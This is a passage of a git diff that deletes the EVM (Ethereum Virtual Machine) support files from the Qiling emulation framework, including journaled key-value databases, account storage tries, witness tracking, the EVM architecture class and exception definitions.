checkpoint. - """ - __slots__ = ['_wrapped_db', '_journal', 'record', 'commit'] - - def __init__(self, wrapped_db: DatabaseAPI) -> None: - self._wrapped_db = wrapped_db - self._journal = Journal() - self.record = self._journal.record_checkpoint - self.commit = self._journal.commit_checkpoint - self.reset() - - def __getitem__(self, key: bytes) -> bytes: - - val = self._journal[key] - if val is DELETE_WRAPPED: - raise KeyError( - key, - "item is deleted in JournalDB, and will be deleted from the wrapped DB", - ) - elif val is REVERT_TO_WRAPPED: - raise KeyError( - key, - "item is deleted in JournalDB, and is presumed gone from the wrapped DB", - ) - elif val is None: - return self._wrapped_db[key] - else: - # mypy doesn't allow custom type guards yet so we need to cast here - # even though we know it can only be `bytes` at this point. - return cast(bytes, val) - - def __setitem__(self, key: bytes, value: bytes) -> None: - """ - - replacing an existing value - - setting a value that does not exist - """ - self._journal[key] = value - - def _exists(self, key: bytes) -> bool: - val = self._journal[key] - if val in (REVERT_TO_WRAPPED, DELETE_WRAPPED): - return False - elif val is None: - return key in self._wrapped_db - else: - return True - - def clear(self) -> None: - """ - Remove all keys. Immediately after a clear, *all* getitem requests will return a KeyError. - That includes the changes pending persist and any data in the underlying database. - - (This action is journaled, like all other actions) - - clear will *not* persist the emptying of all keys in the underlying DB. - It only prevents any updates (or deletes!) before it from being persisted. - - Any caller that wants to use clear must also make sure that the underlying database - reflects their desired end state (maybe emptied, maybe not). - """ - self._journal.clear() - - def has_clear(self) -> bool: - return self._journal.has_clear(self._journal.root_checkpoint) - - def __delitem__(self, key: bytes) -> None: - if key in self._wrapped_db: - self._journal.delete_wrapped(key) - else: - if key in self._journal: - self._journal.delete_local(key) - else: - raise KeyError(key, "key could not be deleted in JournalDB, because it was missing") - - # - # Snapshot API - # - def has_checkpoint(self, checkpoint: JournalDBCheckpoint) -> bool: - return self._journal.has_checkpoint(checkpoint) - - def discard(self, checkpoint: JournalDBCheckpoint) -> None: - """ - Throws away all journaled data starting at the given checkpoint - """ - self._journal.discard(checkpoint) - - def _reapply_checkpoint_to_journal( - self, - journal_data: ChangesetDict) -> None: - for key, value in journal_data.items(): - if value is DELETE_WRAPPED: - self._journal.delete_wrapped(key) - elif value is REVERT_TO_WRAPPED: - self._journal.delete_local(key) - else: - self._journal[key] = cast(bytes, value) - - def persist(self) -> None: - """ - Persist all changes in underlying db. After all changes have been written the - JournalDB starts a new recording. - """ - journal_data = self._journal.pop_all() - - for key, value in journal_data.items(): - try: - if value is DELETE_WRAPPED: - del self._wrapped_db[key] - elif value is REVERT_TO_WRAPPED: - pass - else: - self._wrapped_db[key] = cast(bytes, value) - except Exception: - self._reapply_checkpoint_to_journal(journal_data) - raise - - def flatten(self) -> None: - """ - Commit everything possible without persisting - """ - self._journal.flatten() - - def reset(self) -> None: - """ - Reset the entire journal. - """ - self._journal.pop_all() - - def diff(self) -> DBDiff: - """ - Generate a DBDiff of all pending changes. - These are the changes that would occur if :meth:`persist()` were called. - """ - return self._journal.diff() diff --git a/qiling/arch/evm/db/keymap.py b/qiling/arch/evm/db/keymap.py deleted file mode 100644 index a830577b7..000000000 --- a/qiling/arch/evm/db/keymap.py +++ /dev/null @@ -1,49 +0,0 @@ -from abc import ( - abstractmethod, -) - -from typing import ( - Any, -) - -from ..abc import DatabaseAPI -from ..db.backends.base import BaseDB - - -class KeyMapDB(BaseDB): - """ - Modify keys when accessing the database, according to the - abstract keymap function set in the subclass. - """ - def __init__(self, db: DatabaseAPI) -> None: - self._db = db - - @staticmethod - @abstractmethod - def keymap(key: bytes) -> bytes: - raise NotImplementedError - - def __getitem__(self, key: bytes) -> bytes: - mapped_key = self.keymap(key) - return self._db[mapped_key] - - def __setitem__(self, key: bytes, val: bytes) -> None: - mapped_key = self.keymap(key) - self._db[mapped_key] = val - - def __delitem__(self, key: bytes) -> None: - mapped_key = self.keymap(key) - del self._db[mapped_key] - - def __contains__(self, key: bytes) -> bool: # type: ignore # Breaks LSP - mapped_key = self.keymap(key) - return mapped_key in self._db - - def __getattr__(self, attr: Any) -> Any: - return getattr(self._db, attr) - - def __setattr__(self, attr: Any, val: Any) -> None: - if attr in ('_db', 'keymap'): - super().__setattr__(attr, val) - else: - setattr(self._db, attr, val) diff --git a/qiling/arch/evm/db/slow_journal.py b/qiling/arch/evm/db/slow_journal.py deleted file mode 100644 index 20314ea9d..000000000 --- a/qiling/arch/evm/db/slow_journal.py +++ /dev/null @@ -1,447 +0,0 @@ -import collections -from typing import cast, Dict, Set, Union -import uuid - -from eth_utils.toolz import ( - first, - merge, - nth, -) -from eth_utils import ( - ValidationError, -) - -from ..abc import DatabaseAPI -from ..db.backends.base import BaseDB -from ..db.diff import DBDiff, DBDiffTracker - - -class DeletedEntry: - pass - - -# Track two different kinds of deletion: - -# 1. key in wrapped -# 2. key modified in journal -# 3. key deleted -DELETED_ENTRY = DeletedEntry() - -# 1. key not in wrapped -# 2. key created in journal -# 3. key deleted -ERASE_CREATED_ENTRY = DeletedEntry() - - -class Journal(BaseDB): - """ - A Journal is an ordered list of changesets. A changeset is a dictionary - of database keys and values. The values are tracked changes that were - written after the changeset was created - - Changesets are referenced by a random uuid4. - """ - - def __init__(self) -> None: - # contains a mapping from all of the `uuid4` changeset_ids - # to a dictionary of key:value pairs with the recorded changes - # that belong to the changeset - self.journal_data: collections.OrderedDict[uuid.UUID, Dict[bytes, Union[bytes, DeletedEntry]]] = collections.OrderedDict() # noqa E501 - self._clears_at: Set[uuid.UUID] = set() - - @property - def root_changeset_id(self) -> uuid.UUID: - """ - Returns the id of the root changeset - """ - return first(self.journal_data.keys()) - - @property - def is_flattened(self) -> bool: - """ - :return: whether there are any explicitly committed checkpoints - """ - return len(self.journal_data) < 2 - - @property - def latest_id(self) -> uuid.UUID: - """ - Returns the id of the latest changeset - """ - # last() was iterating through all values, so first(reversed()) gives a 12.5x speedup - return first(reversed(self.journal_data.keys())) - - @property - def latest(self) -> Dict[bytes, Union[bytes, DeletedEntry]]: - """ - Returns the dictionary of db keys and values for the latest changeset. - """ - return self.journal_data[self.latest_id] - - @latest.setter - def latest(self, value: Dict[bytes, Union[bytes, DeletedEntry]]) -> None: - """ - Setter for updating the *latest* changeset. - """ - self.journal_data[self.latest_id] = value - - def is_empty(self) -> bool: - return len(self.journal_data) == 0 - - def has_changeset(self, changeset_id: uuid.UUID) -> bool: - return changeset_id in self.journal_data - - def record_changeset(self, custom_changeset_id: uuid.UUID = None) -> uuid.UUID: - """ - Creates a new changeset. Changesets are referenced by a random uuid4 - to prevent collisions between multiple changesets. - """ - if custom_changeset_id is not None: - if custom_changeset_id in self.journal_data: - raise ValidationError( - f"Tried to record with an existing changeset id: {custom_changeset_id!r}" - ) - else: - changeset_id = custom_changeset_id - else: - changeset_id = uuid.uuid4() - - self.journal_data[changeset_id] = {} - return changeset_id - - def pop_changeset(self, changeset_id: uuid.UUID) -> Dict[bytes, Union[bytes, DeletedEntry]]: - """ - Returns all changes from the given changeset. This includes all of - the changes from any subsequent changeset, giving precedence to - later changesets. - """ - if changeset_id not in self.journal_data: - raise KeyError(changeset_id, "Unknown changeset in JournalDB") - - all_ids = tuple(self.journal_data.keys()) - changeset_idx = all_ids.index(changeset_id) - changesets_to_pop = all_ids[changeset_idx:] - popped_clears = tuple(idx for idx in changesets_to_pop if idx in self._clears_at) - if popped_clears: - last_clear_idx = changesets_to_pop.index(popped_clears[-1]) - changesets_to_drop = changesets_to_pop[:last_clear_idx] - changesets_to_merge = changesets_to_pop[last_clear_idx:] - else: - changesets_to_drop = () - changesets_to_merge = changesets_to_pop - - # we pull all of the changesets *after* the changeset we are - # reverting to and collapse them to a single set of keys (giving - # precedence to later changesets) - changeset_data = merge(*( - self.journal_data.pop(c_id) - for c_id - in changesets_to_merge - )) - - # drop the changes on the floor if they came before a clear that is being committed - for changeset_id in changesets_to_drop: - self.journal_data.pop(changeset_id) - - self._clears_at.difference_update(popped_clears) - return changeset_data - - def clear(self) -> None: - """ - Treat as if the *underlying* database will also be cleared by some other mechanism. - We build a special empty changeset just for marking that all previous data should - be ignored. - """ - # these internal records are used as a way to tell the difference between - # changes that came before and after the clear - self.record_changeset() - self._clears_at.add(self.latest_id) - self.record_changeset() - - def has_clear(self, check_changeset_id: uuid.UUID) -> bool: - for changeset_id in reversed(self.journal_data.keys()): - if changeset_id in self._clears_at: - return True - elif check_changeset_id == changeset_id: - return False - raise ValidationError("Changeset ID %s is not in the journal" % check_changeset_id) - - def commit_changeset(self, changeset_id: uuid.UUID) -> Dict[bytes, Union[bytes, DeletedEntry]]: - """ - Collapses all changes for the given changeset into the previous - changesets if it exists. - """ - does_clear = self.has_clear(changeset_id) - changeset_data = self.pop_changeset(changeset_id) - if not self.is_empty(): - # we only have to assign changeset data into the latest changeset if - # there is one. - if does_clear: - # if there was a clear and more changesets underneath then clear the latest - # changeset, and replace with a new clear changeset - self.latest = {} - self._clears_at.add(self.latest_id) - self.record_changeset() - self.latest = changeset_data - else: - # otherwise, merge in all the current data - self.latest = merge( - self.latest, - changeset_data, - ) - return changeset_data - - def flatten(self) -> None: - if self.is_flattened: - return - - changeset_id_after_root = nth(1, self.journal_data.keys()) - self.commit_changeset(changeset_id_after_root) - - # - # Database API - # - def __getitem__(self, key: bytes) -> Union[bytes, DeletedEntry]: # type: ignore # Breaks LSP - """ - For key lookups we need to iterate through the changesets in reverse - order, returning from the first one in which the key is present. - """ - # Ignored from mypy because of https://github.com/python/typeshed/issues/2078 - for changeset_id, changeset_data in reversed(self.journal_data.items()): - if changeset_id in self._clears_at: - return ERASE_CREATED_ENTRY - elif key in changeset_data: - return changeset_data[key] - else: - continue - - return None - - def __setitem__(self, key: bytes, value: bytes) -> None: - self.latest[key] = value - - def _exists(self, key: bytes) -> bool: - val = self.get(key) - return val is not None and val not in (ERASE_CREATED_ENTRY, DELETED_ENTRY) - - def __delitem__(self, key: bytes) -> None: - raise NotImplementedError("You must delete with one of delete_local or delete_wrapped") - - def delete_wrapped(self, key: bytes) -> None: - self.latest[key] = DELETED_ENTRY - - def delete_local(self, key: bytes) -> None: - self.latest[key] = ERASE_CREATED_ENTRY - - def diff(self) -> DBDiff: - tracker = DBDiffTracker() - visited_keys: Set[bytes] = set() - - # Iterate in reverse, so you can skip over any keys from old checkpoints. - # This is required so that when a key is created and then deleted in the journal, - # we don't add the delete to the diff. (We simply omit the change altogether) - for changeset_id, changeset in reversed(self.journal_data.items()): - if changeset_id in self._clears_at: - break - - for key, value in changeset.items(): - if key in visited_keys: - # this old change has already been tracked - continue - elif value is DELETED_ENTRY: - del tracker[key] - elif value is ERASE_CREATED_ENTRY: - pass - else: - tracker[key] = cast(bytes, value) - - visited_keys.add(key) - - return tracker.diff() - - -class JournalDB(BaseDB): - """ - A wrapper around the basic DB objects that keeps a journal of all changes. - Each time a recording is started, the underlying journal creates a new - changeset and assigns an id to it. The journal then keeps track of all changes - that go into this changeset. - - Discarding a changeset simply throws it away inculding all subsequent changesets - that may have followed. Commiting a changeset merges the given changeset and all - subsequent changesets into the previous changeset giving precidence to later - changesets in case of conflicting keys. - - Nothing is written to the underlying db until `persist()` is called. - - The added memory footprint for a JournalDB is one key/value stored per - database key which is changed. Subsequent changes to the same key within - the same changeset will not increase the journal size since we only need - to track latest value for any given key within any given changeset. - """ - wrapped_db = None - journal: Journal = None - - def __init__(self, wrapped_db: DatabaseAPI) -> None: - self.wrapped_db = wrapped_db - self.reset() - - def __getitem__(self, key: bytes) -> bytes: - - val = self.journal[key] - if val is DELETED_ENTRY: - raise KeyError( - key, - "item is deleted in JournalDB, and will be deleted from the wrapped DB", - ) - elif val is ERASE_CREATED_ENTRY: - raise KeyError( - key, - "item is deleted in JournalDB, and is presumed gone from the wrapped DB", - ) - elif val is None: - return self.wrapped_db[key] - else: - # mypy doesn't allow custom type guards yet so we need to cast here - # even though we know it can only be `bytes` at this point. - return cast(bytes, val) - - def __setitem__(self, key: bytes, value: bytes) -> None: - """ - - replacing an existing value - - setting a value that does not exist - """ - self.journal[key] = value - - def _exists(self, key: bytes) -> bool: - val = self.journal[key] - if val in (ERASE_CREATED_ENTRY, DELETED_ENTRY): - return False - elif val is None: - return key in self.wrapped_db - else: - return True - - def clear(self) -> None: - """ - Remove all keys. Immediately after a clear, *all* getitem requests will return a KeyError. - That includes the changes pending persist and any data in the underlying database. - - (This action is journaled, like all other actions) - - clear will *not* persist the emptying of all keys in the underlying DB. - It only prevents any updates (or deletes!) before it from being persisted. - - Any caller that wants to use clear must also make sure that the underlying database - reflects their desired end state (maybe emptied, maybe not). - """ - self.journal.clear() - - def has_clear(self) -> bool: - return self.journal.has_clear(self.journal.root_changeset_id) - - def __delitem__(self, key: bytes) -> None: - if key in self.wrapped_db: - self.journal.delete_wrapped(key) - else: - if key in self.journal: - self.journal.delete_local(key) - else: - raise KeyError(key, "key could not be deleted in JournalDB, because it was missing") - - # - # Snapshot API - # - def _validate_changeset(self, changeset_id: uuid.UUID) -> None: - """ - Checks to be sure the changeset is known by the journal - """ - if not self.journal.has_changeset(changeset_id): - raise ValidationError(f"Changeset not found in journal: {str(changeset_id)}") - - def has_changeset(self, changeset_id: uuid.UUID) -> bool: - return self.journal.has_changeset(changeset_id) - - def record(self, custom_changeset_id: uuid.UUID = None) -> uuid.UUID: - """ - Starts a new recording and returns an id for the associated changeset - """ - return self.journal.record_changeset(custom_changeset_id) - - def discard(self, changeset_id: uuid.UUID) -> None: - """ - Throws away all journaled data starting at the given changeset - """ - self._validate_changeset(changeset_id) - self.journal.pop_changeset(changeset_id) - - def commit(self, changeset_id: uuid.UUID) -> None: - """ - Commits a given changeset. This merges the given changeset and all - subsequent changesets into the previous changeset giving precidence - to later changesets in case of any conflicting keys. - """ - self._validate_changeset(changeset_id) - if changeset_id == self.journal.root_changeset_id: - raise ValidationError( - "Tried to commit the root changeset. Callers should not keep references " - "to the root changeset. Maybe you meant to use persist()?" - ) - self.journal.commit_changeset(changeset_id) - - def _reapply_changeset_to_journal( - self, - changeset_id: uuid.UUID, - journal_data: Dict[bytes, Union[bytes, DeletedEntry]]) -> None: - self.record(changeset_id) - for key, value in journal_data.items(): - if value is DELETED_ENTRY: - self.journal.delete_wrapped(key) - elif value is ERASE_CREATED_ENTRY: - self.journal.delete_local(key) - else: - self.journal[key] = cast(bytes, value) - - def persist(self) -> None: - """ - Persist all changes in underlying db. After all changes have been written the - JournalDB starts a new recording. - """ - root_changeset = self.journal.root_changeset_id - journal_data = self.journal.commit_changeset(root_changeset) - - # Ensure the journal automatically restarts recording after - # it has been persisted to the underlying db - self.reset() - - for key, value in journal_data.items(): - try: - if value is DELETED_ENTRY: - del self.wrapped_db[key] - elif value is ERASE_CREATED_ENTRY: - pass - else: - self.wrapped_db[key] = cast(bytes, value) - except Exception: - self._reapply_changeset_to_journal(root_changeset, journal_data) - raise - - def flatten(self) -> None: - """ - Commit everything possible without persisting - """ - self.journal.flatten() - - def reset(self) -> None: - """ - Reset the entire journal. - """ - self.journal = Journal() - self.record() - - def diff(self) -> DBDiff: - """ - Generate a DBDiff of all pending changes. - These are the changes that would occur if :meth:`persist()` were called. - """ - return self.journal.diff() diff --git a/qiling/arch/evm/db/storage.py b/qiling/arch/evm/db/storage.py deleted file mode 100644 index f8915da42..000000000 --- a/qiling/arch/evm/db/storage.py +++ /dev/null @@ -1,429 +0,0 @@ -from typing import ( - FrozenSet, - List, - NamedTuple, - Set, -) - -from eth_hash.auto import keccak -from eth_typing import ( - Address, - Hash32, -) -from eth_utils import ( - ValidationError, - encode_hex, - get_extended_debug_logger, - int_to_big_endian, - to_bytes, - to_int, -) -import rlp -from trie import ( - HexaryTrie, - exceptions as trie_exceptions, -) - -from .._utils.padding import ( - pad32, -) -from ..abc import ( - AccountStorageDatabaseAPI, - AtomicDatabaseAPI, - DatabaseAPI, -) -from ..constants import ( - BLANK_ROOT_HASH, -) -from ..db.backends.base import ( - BaseDB, -) -from ..db.backends.memory import ( - MemoryDB, -) -from ..db.batch import ( - BatchDB, -) -from ..db.cache import ( - CacheDB, -) -from ..db.journal import ( - JournalDB, -) -from ..vm.interrupt import ( - MissingStorageTrieNode, -) -from ..typing import ( - JournalDBCheckpoint, -) - - -class PendingWrites(NamedTuple): - """ - A set of variables captured just before account storage deletion. - The variables are used to revive storage if the EVM reverts to a point - prior to deletion. - """ - write_trie: HexaryTrie # The write trie at the time of deletion - trie_nodes_batch: BatchDB # A batch of all trie nodes written to the trie - starting_root_hash: Hash32 # The starting root hash - - -class StorageLookup(BaseDB): - """ - This lookup converts lookups of storage slot integers into the appropriate trie lookup. - Similarly, it persists changes to the appropriate trie at write time. - - StorageLookup also tracks the state roots changed since the last persist. - """ - logger = get_extended_debug_logger("eth.db.storage.StorageLookup") - - # The trie that is modified in-place, used to calculate storage root on-demand - _write_trie: HexaryTrie - - # These are the new trie nodes, waiting to be committed to disk - _trie_nodes_batch: BatchDB - - # When deleting an account, push the pending write info onto this stack. - # This stack can get as big as the number of transactions per block: one for each delete. - _historical_write_tries: List[PendingWrites] - - def __init__(self, db: DatabaseAPI, storage_root: Hash32, address: Address) -> None: - self._db = db - - # Set the starting root hash, to be used for on-disk storage read lookups - self._initialize_to_root_hash(storage_root) - - self._address = address - - def _get_write_trie(self) -> HexaryTrie: - if self._trie_nodes_batch is None: - self._trie_nodes_batch = BatchDB(self._db, read_through_deletes=True) - - if self._write_trie is None: - batch_db = self._trie_nodes_batch - self._write_trie = HexaryTrie(batch_db, root_hash=self._starting_root_hash, prune=True) - - return self._write_trie - - def _get_read_trie(self) -> HexaryTrie: - if self._write_trie is not None: - return self._write_trie - else: - # Creating "HexaryTrie" is a pretty light operation, so not a huge cost - # to create a new one at every read, but we could - # cache the read trie, if this becomes a bottleneck. - return HexaryTrie(self._db, root_hash=self._starting_root_hash) - - def _decode_key(self, key: bytes) -> bytes: - padded_slot = pad32(key) - return keccak(padded_slot) - - def __getitem__(self, key: bytes) -> bytes: - hashed_slot = self._decode_key(key) - read_trie = self._get_read_trie() - try: - return read_trie[hashed_slot] - except trie_exceptions.MissingTrieNode as exc: - raise MissingStorageTrieNode( - exc.missing_node_hash, - self._starting_root_hash, - exc.requested_key, - exc.prefix, - self._address, - ) from exc - - def __setitem__(self, key: bytes, value: bytes) -> None: - hashed_slot = self._decode_key(key) - write_trie = self._get_write_trie() - write_trie[hashed_slot] = value - - def _exists(self, key: bytes) -> bool: - # used by BaseDB for __contains__ checks - hashed_slot = self._decode_key(key) - read_trie = self._get_read_trie() - return hashed_slot in read_trie - - def __delitem__(self, key: bytes) -> None: - hashed_slot = self._decode_key(key) - write_trie = self._get_write_trie() - try: - del write_trie[hashed_slot] - except trie_exceptions.MissingTrieNode as exc: - raise MissingStorageTrieNode( - exc.missing_node_hash, - self._starting_root_hash, - exc.requested_key, - exc.prefix, - self._address, - ) from exc - - @property - def has_changed_root(self) -> bool: - return self._write_trie is not None - - def get_changed_root(self) -> Hash32: - if self._write_trie is not None: - return self._write_trie.root_hash - else: - raise ValidationError("Asked for changed root when no writes have been made") - - def _initialize_to_root_hash(self, root_hash: Hash32) -> None: - self._starting_root_hash = root_hash - self._write_trie = None - self._trie_nodes_batch = None - - # Reset the historical writes, which can't be reverted after committing - self._historical_write_tries = [] - - def commit_to(self, db: DatabaseAPI) -> None: - """ - Trying to commit changes when nothing has been written will raise a - ValidationError - """ - if self._trie_nodes_batch is None: - raise ValidationError( - "It is invalid to commit an account's storage if it has no pending changes. " - "Always check storage_lookup.has_changed_root before attempting to commit. " - f"Write tries on stack = {len(self._historical_write_tries)}; Root hash = " - f"{encode_hex(self._starting_root_hash)}" - ) - self._trie_nodes_batch.commit_to(db, apply_deletes=False) - - # Mark the trie as having been all written out to the database. - # It removes the 'dirty' flag and clears out any pending writes. - self._initialize_to_root_hash(self._write_trie.root_hash) - - def new_trie(self) -> int: - """ - Switch to an empty trie. Save the old trie, and pending writes, in - case of a revert. - - :return: index for reviving the previous trie - """ - write_trie = self._get_write_trie() - - # Write the previous trie into a historical stack - self._historical_write_tries.append(PendingWrites( - write_trie, - self._trie_nodes_batch, - self._starting_root_hash, - )) - - new_idx = len(self._historical_write_tries) - self._starting_root_hash = BLANK_ROOT_HASH - self._write_trie = None - self._trie_nodes_batch = None - - return new_idx - - def rollback_trie(self, trie_index: int) -> None: - """ - Revert back to the previous trie, using the index returned by a - :meth:`~new_trie` call. The index returned by that call returns you - to the trie in place *before* the call. - - :param trie_index: index for reviving the previous trie - """ - - if trie_index >= len(self._historical_write_tries): - raise ValidationError( - f"Trying to roll back a delete to index {trie_index}, but there are only" - f" {len(self._historical_write_tries)} indices available." - ) - - ( - self._write_trie, - self._trie_nodes_batch, - self._starting_root_hash, - ) = self._historical_write_tries[trie_index] - - # Cannot roll forward after a rollback, so remove created/ignored tries. - # This also deletes the trie that you just reverted to. It will be re-added - # to the stack when the next new_trie() is called. - del self._historical_write_tries[trie_index:] - - -CLEAR_COUNT_KEY_NAME = b'clear-count' - - -class AccountStorageDB(AccountStorageDatabaseAPI): - logger = get_extended_debug_logger("eth.db.storage.AccountStorageDB") - - def __init__(self, db: AtomicDatabaseAPI, storage_root: Hash32, address: Address) -> None: - """ - Database entries go through several pipes, like so... - - .. code:: - - db -> _storage_lookup -> _storage_cache -> _locked_changes -> _journal_storage - - db is the raw database, we can assume it hits disk when written to. - Keys are stored as node hashes and rlp-encoded node values. - - _storage_lookup is itself a pair of databases: (BatchDB -> HexaryTrie), - writes to storage lookup *are* immeditaely applied to a trie, generating - the appropriate trie nodes and and root hash (via the HexaryTrie). The - writes are *not* persisted to db, until _storage_lookup is explicitly instructed to, - via :meth:`StorageLookup.commit_to` - - _storage_cache is a cache tied to the state root of the trie. It - is important that this cache is checked *after* looking for - the key in _journal_storage, because the cache is only invalidated - after a state root change. Otherwise, you will see data since the last - storage root was calculated. - - _locked_changes is a batch database that includes only those values that are - un-revertable in the EVM. Currently, that means changes that completed in a - previous transaction. - - Journaling batches writes at the _journal_storage layer, until persist is called. - It manages all the checkpointing and rollbacks that happen during EVM execution. - - In both _storage_cache and _journal_storage, Keys are set/retrieved as the - big_endian encoding of the slot integer, and the rlp-encoded value. - """ - self._address = address - self._storage_lookup = StorageLookup(db, storage_root, address) - self._storage_cache = CacheDB(self._storage_lookup) - self._locked_changes = JournalDB(self._storage_cache) - self._journal_storage = JournalDB(self._locked_changes) - self._accessed_slots: Set[int] = set() - - # Track how many times we have cleared the storage. This is journaled - # in lockstep with other storage changes. That way, we can detect if a revert - # causes use to revert past the previous storage deletion. The clear count is used - # as an index to find the base trie from before the revert. - self._clear_count = JournalDB(MemoryDB({CLEAR_COUNT_KEY_NAME: to_bytes(0)})) - - def get(self, slot: int, from_journal: bool = True) -> int: - self._accessed_slots.add(slot) - key = int_to_big_endian(slot) - lookup_db = self._journal_storage if from_journal else self._locked_changes - try: - encoded_value = lookup_db[key] - except MissingStorageTrieNode: - raise - except KeyError: - return 0 - - if encoded_value == b'': - return 0 - else: - return rlp.decode(encoded_value, sedes=rlp.sedes.big_endian_int) - - def set(self, slot: int, value: int) -> None: - key = int_to_big_endian(slot) - if value: - self._journal_storage[key] = rlp.encode(value) - else: - try: - current_val = self._journal_storage[key] - except KeyError: - # deleting an empty key has no effect - return - else: - if current_val != b'': - # only try to delete the value if it's present - del self._journal_storage[key] - - def delete(self) -> None: - self._journal_storage.clear() - self._storage_cache.reset_cache() - - # Empty out the storage lookup trie (keeping history, in case of a revert) - new_clear_count = self._storage_lookup.new_trie() - - # Look up the previous count of how many times the account has been deleted. - # This can happen multiple times in one block, via CREATE2. - old_clear_count = to_int(self._clear_count[CLEAR_COUNT_KEY_NAME]) - - # Gut check that we have incremented correctly - if new_clear_count != old_clear_count + 1: - raise ValidationError( - f"Must increase clear count by one on each delete. Instead, went from" - f" {old_clear_count} -> {new_clear_count} in account 0x{self._address.hex()}" - ) - - # Save the new count, ie~ the index used for a future revert. - self._clear_count[CLEAR_COUNT_KEY_NAME] = to_bytes(new_clear_count) - - def record(self, checkpoint: JournalDBCheckpoint) -> None: - self._journal_storage.record(checkpoint) - self._clear_count.record(checkpoint) - - def discard(self, checkpoint: JournalDBCheckpoint) -> None: - latest_clear_count = to_int(self._clear_count[CLEAR_COUNT_KEY_NAME]) - - if self._journal_storage.has_checkpoint(checkpoint): - self._journal_storage.discard(checkpoint) - self._clear_count.discard(checkpoint) - else: - # if the checkpoint comes before this account started tracking, - # then simply reset to the beginning - self._journal_storage.reset() - self._clear_count.reset() - self._storage_cache.reset_cache() - - reverted_clear_count = to_int(self._clear_count[CLEAR_COUNT_KEY_NAME]) - - if reverted_clear_count == latest_clear_count - 1: - # This revert rewinds past a trie deletion, so roll back to the trie at - # that point. We use the clear count as an index to get back to the - # old base trie. - self._storage_lookup.rollback_trie(reverted_clear_count) - elif reverted_clear_count == latest_clear_count: - # No change in the base trie, take no action - pass - else: - # Although CREATE2 permits multiple creates and deletes in a single block, - # you can still only revert across a single delete. That's because delete - # is only triggered at the end of the transaction. - raise ValidationError( - f"This revert has changed the clear count in an invalid way, from" - f" {latest_clear_count} to {reverted_clear_count}, in 0x{self._address.hex()}" - ) - - def commit(self, checkpoint: JournalDBCheckpoint) -> None: - if self._journal_storage.has_checkpoint(checkpoint): - self._journal_storage.commit(checkpoint) - self._clear_count.commit(checkpoint) - else: - # if the checkpoint comes before this account started tracking, - # then flatten all changes, without persisting - self._journal_storage.flatten() - self._clear_count.flatten() - - def lock_changes(self) -> None: - if self._journal_storage.has_clear(): - self._locked_changes.clear() - self._journal_storage.persist() - - def make_storage_root(self) -> None: - self.lock_changes() - self._locked_changes.persist() - - def _validate_flushed(self) -> None: - """ - Will raise an exception if there are some changes made since the last persist. - """ - journal_diff = self._journal_storage.diff() - if len(journal_diff) > 0: - raise ValidationError( - f"StorageDB had a dirty journal when it needed to be clean: {journal_diff!r}" - ) - - def get_accessed_slots(self) -> FrozenSet[int]: - return frozenset(self._accessed_slots) - - @property - def has_changed_root(self) -> bool: - return self._storage_lookup.has_changed_root - - def get_changed_root(self) -> Hash32: - return self._storage_lookup.get_changed_root() - - def persist(self, db: DatabaseAPI) -> None: - self._validate_flushed() - if self._storage_lookup.has_changed_root: - self._storage_lookup.commit_to(db) diff --git a/qiling/arch/evm/db/witness.py b/qiling/arch/evm/db/witness.py deleted file mode 100644 index ab49ee2e5..000000000 --- a/qiling/arch/evm/db/witness.py +++ /dev/null @@ -1,64 +0,0 @@ -from typing import ( - Dict, - FrozenSet, - NamedTuple, - Set, -) - -from eth_typing import ( - Address, - Hash32, -) - -from ..abc import ( - MetaWitnessAPI, -) - - -class AccountQueryTracker(NamedTuple): - did_query_bytecode: bool - slots_queried: FrozenSet[int] - - -class MetaWitness(MetaWitnessAPI): - def __init__( - self, - witness_hashes: Set[Hash32], - accounts_metadata_queried: Dict[Address, AccountQueryTracker]) -> None: - - self._trie_node_hashes = frozenset(witness_hashes) - self._accounts_metadata_queried = accounts_metadata_queried - - @property - def hashes(self) -> FrozenSet[Hash32]: - return self._trie_node_hashes - - @property - def accounts_queried(self) -> FrozenSet[Address]: - return frozenset(self._accounts_metadata_queried.keys()) - - @property - def account_bytecodes_queried(self) -> FrozenSet[Address]: - return frozenset( - address - for address, query_tracker in self._accounts_metadata_queried.items() - if query_tracker.did_query_bytecode - ) - - def get_slots_queried(self, address: Address) -> FrozenSet[int]: - try: - query_tracker = self._accounts_metadata_queried[address] - except KeyError: - return frozenset() - else: - return query_tracker.slots_queried - - @property - def total_slots_queried(self) -> int: - """ - Summed across all accounts, how many storage slots were queried? - """ - return sum( - len(query_tracker.slots_queried) - for query_tracker in self._accounts_metadata_queried.values() - ) diff --git a/qiling/arch/evm/evm.py b/qiling/arch/evm/evm.py deleted file mode 100644 index c37bd5b4f..000000000 --- a/qiling/arch/evm/evm.py +++ /dev/null @@ -1,70 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework - - -import types - -from qiling.arch.arch import QlArch -from qiling.arch.evm.hooks import monkeypatch_core_hooks -from qiling.arch.evm.vm.evm import QlArchEVMEmulator -from qiling.arch.evm.vm.message import Message -from qiling.const import * - - -class QlArchEVM(QlArch): - type = QL_ARCH.EVM - bits = 1 - - def __init__(self, ql) -> None: - super(QlArchEVM, self).__init__(ql) - self.evm = QlArchEVMEmulator(self.ql) - - monkeypatch_core_hooks(self.ql) - monkeypatch_core_methods(self.ql) - - def run(self, msg): - return self.evm.vm.execute_message(msg) - - def stack_push(self, value): - return None - - def stack_pop(self): - return None - - def stack_read(self, offset): - return None - - def stack_write(self, offset, data): - return None - - @property - def uc(self): - raise AttributeError - - @property - def regs(self): - raise AttributeError - - @property - def disassembler(self): - raise AttributeError - - @property - def assembler(self): - raise AttributeError - - @property - def endian(self) -> QL_ENDIAN: - return QL_ENDIAN.EL - - -def __evm_run(self, code: Message): - return self.arch.run(code) - - -def monkeypatch_core_methods(ql): - """Monkeypatch core methods for evm - """ - - ql.run = types.MethodType(__evm_run, ql) diff --git a/qiling/arch/evm/exceptions.py b/qiling/arch/evm/exceptions.py deleted file mode 100644 index abd33315d..000000000 --- a/qiling/arch/evm/exceptions.py +++ /dev/null @@ -1,190 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from eth_typing import Hash32 - - -class PyEVMError(Exception): - """ - Base class for all py-evm errors. - """ - pass - - -class VMNotFound(PyEVMError): - """ - Raised when no VM is available for the provided block number. - """ - pass - - -class StateRootNotFound(PyEVMError): - """ - Raised when the requested state root is not present in our DB. - """ - @property - def missing_state_root(self) -> Hash32: - return self.args[0] - - -class HeaderNotFound(PyEVMError): - """ - Raised when a header with the given number/hash does not exist. - """ - - -class 